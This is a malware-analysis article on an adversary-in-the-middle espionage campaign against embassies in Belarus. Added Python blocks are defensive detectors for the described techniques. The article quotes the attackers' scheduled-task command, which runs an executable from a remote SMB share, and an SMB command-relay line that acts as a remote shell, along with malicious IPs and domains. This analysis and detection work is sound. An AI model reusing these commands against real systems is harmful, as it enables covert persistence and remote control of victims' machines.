Table of contents
- Investigating the attack on embassies in Belarus
- Initial access under the pretext of Windows update
- Malware, ready for delivery and execution
- Analysis of modular malware
- Analysis of malware from this attack and previous similar attacks
- Conclusion
Investigating the attack on embassies in Belarus
An official of the NSA, explaining his work at a recent conference, used a simple definition: "Our work is simply to produce foreign information." When it comes to infiltrating diplomatic or political centers, the goal is most often to extract information, nothing else.
For groups whose mission falls under this goal, maintaining long-term access is essential, so they carry out their attacks with complex and less-known techniques. In this article we examine one of the attacks on diplomats of countries represented in Belarus and analyze the techniques used, such as AitM (adversary-in-the-middle), DNS exfiltration, and the malware used to collect information.
Initial access under the pretext of Windows update
Suppose you take your laptop to a public place such as a cafe and order a coffee. While the coffee is being prepared, you want to connect your laptop to the cafe's internet.
According to Microsoft's documentation, in Windows 8 and later the operating system first sends a request to your DNS server to resolve www.msftconnecttest.com. If the DNS request succeeds, it sends an HTTP request to https://www.msftconnecttest.com/connecttest.txt and downloads that text file to verify that the system is connected to the Internet (source). What happens if an attacker tampers with this process? That is exactly the attack known as AitM (adversary-in-the-middle).
DNS works like this: the user enters the Google site address in the browser, and the request is sent to the ISP (Internet Service Provider). The ISP's DNS servers, like a dictionary, translate the Google site address into the corresponding IP address. For example, the Google site address translates to 10.20.30.40; that result is returned to the router/modem and to the user's system, which is then directed to the Google site. In our case the DNS request is sent for www.msftconnecttest.com, but it is directed to a malicious address, the path the attacker wants. Two questions should arise: 1. How does this happen? 2. To which malicious address is it directed?
For the first question: in some countries, such as Russia, ISPs were required in 2014 to install devices called SORM-3 on their equipment and servers, which give the Russian intelligence service (FSB) the ability to tamper and eavesdrop through deep packet inspection (source). A precedent for this type of attack appeared in 2018, when Windows applications downloaded from Microsoft servers in Turkey and Egypt were replaced so that a miner was installed instead. In effect, the packet destined for your system is swapped for something else in a fraction of a second (source).
For the second question: it is directed to https://updates.microsoft[.]com/, where a page in Belarusian appears asking the user to update.
If you enter this address in your browser you will probably see a Page Not Found message. This address does not exist outside the country; it is reachable only by victims in that country who use the same ISP, because only that ISP's packets are manipulated.
One thing to note is that the personal systems of residents around that embassy or diplomatic center in Belarus who use the same ISP are not attacked; only the embassies are. So how do the attackers know which packet belongs to whom? The IP address 5.45.121[.]106, which is redirected to the malicious address, belongs to a range of domains on which there is no online service and which has been removed at the domain owner's discretion. This IP cannot be random, because the victim must be clearly identified and no other user should be infected by mistake. (A point that is always visible in complex attacks: to keep the attack covered and hidden from the public and from security experts, its scope must be limited to the intended target and must not spill over elsewhere, which would cause the attack to fail and be exposed.)
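One way a defender can check a network for the NCSI tampering described above, written here as an added example that is not part of the original article: evaluate_ncsi and run_ncsi_check are my own names, and the check assumes the documented NCSI behaviour (a plain HTTP fetch of connecttest.txt that returns the marker text with no redirect).

```python
"""Check the Windows NCSI probe for on-path tampering.
Added example, not from the original article. Windows 8+ resolves
www.msftconnecttest.com and fetches /connecttest.txt, expecting the
plain-text marker "Microsoft Connect Test" and no redirect; an injected
"update" page fails these checks.
"""
import socket
import urllib.error
import urllib.parse
import urllib.request

NCSI_HOST = "www.msftconnecttest.com"
NCSI_URL = f"http://{NCSI_HOST}/connecttest.txt"
EXPECTED_BODY = "Microsoft Connect Test"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse 30x redirects: a genuine NCSI reply is a plain 200."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def evaluate_ncsi(status, final_url, body, content_type=""):
    """Return a list of findings; an empty list means the probe looks genuine."""
    findings = []
    if status != 200:
        findings.append(f"unexpected HTTP status {status}")
    host = (urllib.parse.urlsplit(final_url).hostname or "").lower()
    if host != NCSI_HOST:
        findings.append(f"answer came from {host!r}, not {NCSI_HOST}")
    if body.strip() != EXPECTED_BODY:
        findings.append(f"body {body[:40]!r} is not the NCSI marker")
    if "text/html" in content_type.lower():
        findings.append("HTML page returned where plain text was expected")
    return findings


def run_ncsi_check(timeout=5):
    """Perform the probe live; return (resolved IPs, findings)."""
    ips = sorted({r[4][0] for r in socket.getaddrinfo(NCSI_HOST, 80)})
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(NCSI_URL, timeout=timeout) as resp:
            body = resp.read(4096).decode("utf-8", "replace")
            ctype = resp.headers.get("Content-Type", "")
            return ips, evaluate_ncsi(resp.status, resp.geturl(), body, ctype)
    except urllib.error.HTTPError as err:  # refused redirect or non-200
        ctype = err.headers.get("Content-Type", "") if err.headers else ""
        return ips, evaluate_ncsi(err.code, getattr(err, "url", NCSI_URL), "", ctype)
```

Run run_ncsi_check() from the suspect network and compare the resolved IPs and findings with a run from a known-clean connection; the resolved addresses alone are not proof, since Microsoft's CDN answers vary by region.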
Malware, ready for delivery and execution
After the victim visits the URL of the infected page (which we examined) and clicks the update option, the attacker's JavaScript code starts working behind the scenes. The page shown for the update is as follows:
After pressing the update button, the update function executes the following code:
As you can see in the image, the above code downloads the MicorosftUpdate845255.zip file to the victim's machine. (One of the small things attackers do to hide their attack is to misuse the names of reputable companies for their malware or droppers.)
After extracting and running the MicrosftUpdate845255.exe file, this file acts as a dropper and initial stager.
(Sophisticated attacks do not execute the main malware on the first run; only after checking the environment do they deploy the backdoor and the main malware.) Our file, written in Golang, creates a task in the Windows Task Scheduler using the following command:
schtasks /create /sc minute /mo 1 /tn OfficeBrokerTask /tr \\35.214.56.2\OfficeBroker\OfficeBroker.exe
Points about the above command:
1. The OfficeBroker.exe file is never written to the victim's disk; it runs from the operating system's memory, making the attack what is called fileless (one of the golden points of OPSEC compliance).
2. The IP address belongs to Google Cloud; that is, the same AitM attack, but this time over the SMB protocol instead of HTTP. Also, from the two backslashes preceding the IP address, \\35.214.56[.]2, we can tell that it is SMB.
Summary diagram of the attack in the initial access phase:
The OfficeBroker.exe file in turn acts as another downloader: it can download and run modular malware such as keyloggers, voice recorders, and collectors of the victim's file listings, which we will explore together. By examining the artifacts and analyzing the programming style, it is possible to link other malware of this group in similar attacks. In 2020 this attack was executed again, this time redirecting to the malicious address https://mail.mfa.gov.<redacted>/EdgeUpdate.exe; after execution, the EdgeUpdate.exe malware began creating and executing tasks with more creativity. Let's check them together:
A task with the highest possible privileges, called EdgeUpdateA, is created in the MicrosoftUpdate folder. Its /sc argument sets the schedule, so it is executed every minute, and its /tr argument specifies the path of the executable file.
But notice the interesting part:
\EDGEUPDATE\WINCMDA.exe cmd.exe /c type \\24.9.51[.]94\EDGEUPDATE\EDGEAIN | cmd.exe 1> \\24.9.51[.]94\EDGEUPDATE\EDGEOUT 2>&1
Here we have a reverse shell with a one-second delay. WINCMDA.exe is simply cmd.exe renamed; /c means execute the command and then exit; type reads the contents of a file. In summary: it reads the contents of the EDGEAIN file from the server over SMB, pipes them into cmd.exe, and writes the command output to the EDGEOUT file.
Let's run some commands together:
In the EDGEAIN file that takes the input, we place these commands:
Let's see the output:
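A detector for the two SMB-based techniques shown in the commands above (the scheduled task whose action is a UNC path to \\35.214.56.2, and the EDGEUPDATE "type ... | cmd.exe" relay), written here as an added example that is not part of the original article: analyse_command, scan and the SAMPLE_EVENTS records are my own, the records are constructed to mirror the commands in the text, and the input format (a label plus a command line, as you would pull from scheduled-task listings or process-creation events) is an assumption.

```python
"""Flag command lines that run or read executables from a remote SMB share.
Added example, not from the original article. Two patterns from the text:
a task action that is a UNC path to a public IP (nothing lands on local
disk), and "type <remote file> | cmd.exe ... 1> <remote file>", the SMB
command relay behind the EDGEUPDATE task.
"""
import ipaddress
import re

# UNC path whose server part is a literal IPv4 address.
UNC_IP = re.compile(r"\\\\(\d{1,3}(?:\.\d{1,3}){3})\\[^\s|>]+")
# Contents of a remote file piped into cmd.exe.
PIPE_TO_CMD = re.compile(r"\btype\s+\\\\\S+\s*\|\s*cmd(?:\.exe)?\b", re.I)
# stdout/stderr redirected onto a share (the relay's output channel).
REDIRECT_TO_UNC = re.compile(r"\d?>\s*\\\\\S+")


def analyse_command(cmd):
    """Return reasons the command line is suspicious (empty list = clean)."""
    reasons = []
    for m in UNC_IP.finditer(cmd):
        try:
            ip = ipaddress.ip_address(m.group(1))
        except ValueError:  # e.g. 999.1.1.1 is not an address
            continue
        if ip.is_global:  # a share on a public IP has no business in a task
            reasons.append(f"UNC path to public IP {ip}: {m.group(0)}")
    if PIPE_TO_CMD.search(cmd):
        reasons.append("remote file contents piped into cmd.exe")
    if REDIRECT_TO_UNC.search(cmd):
        reasons.append("command output redirected to an SMB share")
    return reasons


def scan(events):
    """events: iterable of (label, command line); return {label: reasons}."""
    hits = {}
    for label, cmd in events:
        reasons = analyse_command(cmd)
        if reasons:
            hits[label] = reasons
    return hits


# Constructed records mirroring the article's commands plus two benign ones.
SAMPLE_EVENTS = [
    ("task:OfficeBrokerTask", r"\\35.214.56.2\OfficeBroker\OfficeBroker.exe"),
    ("proc:4628", r"cmd.exe /c type \\24.9.51.94\EDGEUPDATE\EDGEAIN | cmd.exe"
                  r" 1> \\24.9.51.94\EDGEUPDATE\EDGEOUT 2>&1"),
    ("proc:4630", r"cmd.exe /c type \\10.0.0.5\share\notes.txt"),
    ("proc:4631", r"C:\Windows\System32\notepad.exe"),
]
```

Private-range shares (like 10.0.0.5) are deliberately left alone so that ordinary file-server use does not alert; feed scan() the action column of your task inventory and the command line of process-creation events.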
Analysis of modular malware
In the OfficeBroker.exe file we have malware in Golang that uses the https://github.com/mozey/schtasks library to create a task and download the rest of the malware, according to the attacker's instructions:
In the last part of the image above, we see a DNS query for windows.system.update[.]com.
The domain windows.system.update[.]com does not exist publicly. Most likely, in combination with the AitM technique, it informs the attacker's C&C of the registration (the initial infection of the victim): the malware issues a DNS query for windows.system.update[.]com, and because this record does not exist on the user's device or in the infected network's nameservers, the request leaves the network and reaches the attacker's DNS server. The downloader and dropper malware of this attack are simple and written with Golang libraries.
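A resolver-log check for the beacon pattern just described, added here as an example that is not part of the original article: classify and scan_dns_log are my own names, the TRUSTED_APEX allowlist and the "client qname rcode" log layout are assumptions, and SAMPLE_LOG is constructed.

```python
"""Flag DNS queries for Microsoft-lookalike names outside Microsoft's domains.
Added example, not from the original article. A name like
windows.system.update.com is never served publicly, so the query ends in
NXDOMAIN and leaves the network, reaching whoever is positioned to see it."""
import collections

BRAND_WORDS = ("microsoft", "msft", "windows", "update", "office", "edge")
# Apex domains Microsoft really uses for these services.
# Assumption: extend this allowlist from your own estate's telemetry.
TRUSTED_APEX = {"microsoft.com", "msftconnecttest.com", "msftncsi.com",
                "windowsupdate.com", "windows.com", "office.com", "live.com"}

def apex(qname):
    """Registrable domain, approximated as the last two labels (no PSL)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])

def classify(qname, rcode):
    """Return None for benign names, else a short verdict string."""
    name = qname.rstrip(".").lower()
    if apex(name) in TRUSTED_APEX:
        return None
    words = [w for w in BRAND_WORDS if w in name]
    if not words:
        return None
    verdict = f"lookalike({','.join(words)})"
    if rcode.upper() == "NXDOMAIN":
        verdict += " nxdomain: query for a name nobody serves left the network"
    return verdict

def scan_dns_log(text):
    """Parse 'client qname rcode' lines; return {client: [(qname, verdict)]}."""
    hits = collections.defaultdict(list)
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        client, qname, rcode = parts
        verdict = classify(qname, rcode)
        if verdict:
            hits[client].append((qname, verdict))
    return dict(hits)

# Constructed resolver log: one NCSI probe, a repeated beacon, benign traffic.
SAMPLE_LOG = """\
10.1.2.7 www.msftconnecttest.com NOERROR
10.1.2.7 windows.system.update.com NXDOMAIN
10.1.2.9 settings-win.data.microsoft.com NOERROR
10.1.2.7 windows.system.update.com NXDOMAIN
10.1.2.12 office-edge-update.example.net NXDOMAIN
"""
```

The same client repeating an NXDOMAIN lookalike query every minute is the signal to chase, since the scheduled task in the article fires at that interval; a single hit can be a typo.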